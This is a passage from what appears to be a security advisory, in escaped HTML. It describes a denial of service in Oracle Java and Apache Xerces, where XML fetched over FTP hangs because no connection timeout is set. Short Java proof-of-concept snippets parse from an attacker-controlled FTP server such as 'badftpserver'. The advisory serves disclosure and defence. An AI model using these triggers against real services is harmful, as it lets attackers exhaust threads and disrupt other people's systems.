class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ab081017809-17\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ab081017809-18\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>java.net.URLConnection &#8211; Concurrency-Related Denial of Service<\/strong><br \/> A Thread Concurrency Denial of Service condition exists when java.net.URLConnection is used to fetch a file from an FTP server without specifying a Connection Timeout value.<\/p>\n<p>The vulnerable functions are:<\/p>\n<ul>\n<li>javax.xml.parsers.SAXParser<\/li>\n<li>javax.xml.parsers.SAXParserFactory<\/li>\n<li>org.dom4j.Document<\/li>\n<li>org.dom4j.io.SAXReader<\/li>\n<li>javax.xml.parsers.DocumentBuilder<\/li>\n<li>javax.xml.parsers.DocumentBuilderFactory<\/li>\n<\/ul>\n<p>The Root Cause Issue in Apache Xerces is the com.sun.org.apache.xerces.internal.impl.XMLEntityManager.class<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3.jpg\" data-slb-active=\"1\" data-slb-asset=\"511416042\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3-300x119.jpg\" alt=\"\" width=\"300\" height=\"119\" class=\"alignnone size-medium wp-image-3274\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3-300x119.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-3.jpg 610w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In this case, XMLEntityManager.class does not explicitly set Connection Timeout for the connect object, letting Java to set a default value of -1, leading to a Denial of Service condition, as explained below.<\/p>\n<p>Example of code using Apache Xerces library to fetch an XML file from an FTP server:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0ae035529858\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [snip]  \tprivate void parseXmlFile() {  \t \/\/get the factory  \t DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();  \t try {  \t  \/\/Using factory get an instance of document builder  \t  DocumentBuilder db = dbf.newDocumentBuilder();  \t  \/\/parse using builder to get DOM representation of the XML file  \t  dom = db.parse(&#8220;ftp:\/\/maliciousftpserver\/test.xml&#8221;); &amp; lt; &#8211; FTP URL controlled by the attacker  \t } catch (ParserConfigurationException pce) {  \t  pce.printStackTrace();  \t } catch (SAXException se) {  \t  se.printStackTrace();  \t } catch (IOException ioe) {  \t  ioe.printStackTrace();  \t }  \t}  [snip]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0ae035529858-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0ae035529858-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">snip<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">parseXmlFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-3\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-c\">\/\/get the factory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-4\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-e\">DocumentBuilderFactory <\/span><span class=\"crayon-v\">dbf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DocumentBuilderFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-5\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-6\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/Using factory get an instance of document builder<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-7\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-e\">DocumentBuilder <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dbf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newDocumentBuilder<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-8\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/parse using builder to get DOM representation of the XML file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-9\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftpserver\/test.xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lt<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FTP <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-e\">controlled <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-i\">attacker<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-10\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ParserConfigurationException <\/span><span class=\"crayon-v\">pce<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-11\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pce<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-12\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">SAXException <\/span><span class=\"crayon-v\">se<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-13\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-v\">se<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-14\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">IOException <\/span><span class=\"crayon-v\">ioe<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-15\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ioe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-16\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0ae035529858-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0ae035529858-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">snip<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0020 seconds] -->  <\/p>\n<p><strong>SAXParser Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0b1068872417\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> SAXParserFactory factory = SAXParserFactory.newInstance();  SAXParser saxParser = factory.newSAXParser();  UserHandler userhandler = new UserHandler();  saxParser.parse(&#8220;ftp:\/\/badftpserver:2121\/whatever.xml\u201d)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0b1068872417-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0b1068872417-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0b1068872417-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0b1068872417-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0b1068872417-1\"><span class=\"crayon-e\">SAXParserFactory <\/span><span class=\"crayon-v\">factory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SAXParserFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0b1068872417-2\"><span class=\"crayon-e\">SAXParser <\/span><span class=\"crayon-v\">saxParser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">factory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newSAXParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0b1068872417-3\"><span class=\"crayon-e\">UserHandler <\/span><span class=\"crayon-v\">userhandler<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">UserHandler<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0b1068872417-4\"><span class=\"crayon-v\">saxParser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><span class=\"crayon-sy\">(<\/span>&#8220;<span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/badftpserver:2121\/whatever.xml\u201d)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p><strong>DOM4J \/ SAXReader Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0b4604365817\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> SAXReader reader = new SAXReader();  Document document = reader.read( &#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221; );<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0b4604365817-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0b4604365817-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0b4604365817-1\"><span class=\"crayon-e\">SAXReader <\/span><span class=\"crayon-v\">reader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SAXReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0b4604365817-2\"><span class=\"crayon-e\">Document <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">reader<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><strong>JAVAX XML Parsers Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0b6808412738\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> DocumentBuilder db = dbf.newDocumentBuilder();\t\t\t  dom = db.parse(&#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0b6808412738-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0b6808412738-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0b6808412738-1\"><span class=\"crayon-e\">DocumentBuilder <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dbf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newDocumentBuilder<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0b6808412738-2\"><span class=\"crayon-v\">dom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/badftpserver:2121\/whatever.xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3271\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 19:11:43 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Oracle Java JDK\/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0) The vulnerabilities are: Oracle JDK\/JRE Concurrency-Related Denial of Service java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure &#8230; <a 